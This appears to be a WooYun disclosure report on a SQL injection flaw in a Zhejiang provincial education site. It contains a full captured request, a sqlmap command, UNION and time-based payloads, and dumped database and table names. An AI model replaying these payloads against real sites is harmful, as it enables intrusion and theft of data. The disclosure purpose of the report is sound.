乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-03: 细节已通知厂商并且等待厂商处理中 2015-04-03: 厂商已经确认,细节仅向厂商公开 2015-04-13: 细节向核心白帽子及相关领域专家公开 2015-04-23: 细节向普通白帽子公开 2015-05-03: 细节向实习白帽子公开 2015-05-18: 细节向公众公开
浙江省教育技术中心SQL注射漏洞
主站存在注射漏洞:
POST /search_magazine_result.php HTTP/1.1Content-Length: 218Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.zjedu.orgCookie: PHPSESSID=ajmr2957k7tv1qm7qcmico1ob2Host: www.zjedu.orgConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*s_author=*&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0%3f%3f%a8%ba%3f%a8%b2&s_key=e
其中s_author和s_key 都存在注入漏洞
将数据包保存为4.txt注入语句:sqlmap.py -r d:\4.txt --level 5 --risk 3 检测结果:
Place: (custom) POSTParameter: #1* Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: s_author=" UNION ALL SELECT CONCAT(0x716b787871,0x6b736e596b5156434656,0x71706b6a71),NULL,NULL,NULL,NULL,NULL,NULL#&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0??%a8%ba?%a8%b2&s_key=e Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (comment) Payload: s_author=" AND SLEEP(5)#&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0??%a8%ba?%a8%b2&s_key=e---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---
可泄露数据库:
Place: (custom) POSTParameter: #1* Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: s_author=" UNION ALL SELECT CONCAT(0x716b787871,0x6b736e596b5156434656,0x71706b6a71),NULL,NULL,NULL,NULL,NULL,NULL#&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0??%a8%ba?%a8%b2&s_key=e Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (comment) Payload: s_author=" AND SLEEP(5)#&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0??%a8%ba?%a8%b2&s_key=e---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0.11available databases [5]:[*] information_sch<font color="red">e</font>ma[*] information_schema[*] t<font color="red">e</font>st[*] test[*] zjjyjs
可泄露表名:
Place: (custom) POSTParameter: #1* Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: s_author=" UNION ALL SELECT CONCAT(0x716b787871,0x6b736e596b5156434656,0x71706b6a71),NULL,NULL,NULL,NULL,NULL,NULL#&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0??%a8%ba?%a8%b2&s_key=e Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (comment) Payload: s_author=" AND SLEEP(5)#&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0??%a8%ba?%a8%b2&s_key=e---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0.11Database: zjjyjs[67 tables]+----------------------------------------------------------------------------------------------------------------------+ || area_group || column_center || column_center2 || djcolumn_center || djinfo_center || document_center || document_receive || document_share || fst_area_over || fst_areadata || fst_ds || fst_ds_sb || fst_sch || fst_schdata || fst_schdata_plan || fst_schdc_plan || fst_tj_plan || fst_xs || fst_xx || info_center || info_center2 || log_center || magazine_cate || magazine_center || magazine_deliver || magazine_stages || meeting_center || meeting_signup || menu_option || nycolumn_center || nyinfo_center || publish_center || right_type || tv_video_stat || user_center || user_group |+----------------------------------------------------------------------------------------------------------------------+
字段名:
过滤参数
危害等级:高
漏洞Rank:12
确认时间:2015-04-03 22:49
非常感谢@netwind和乌云为我们信息安全做的贡献,我们会尽快修复漏洞
暂无
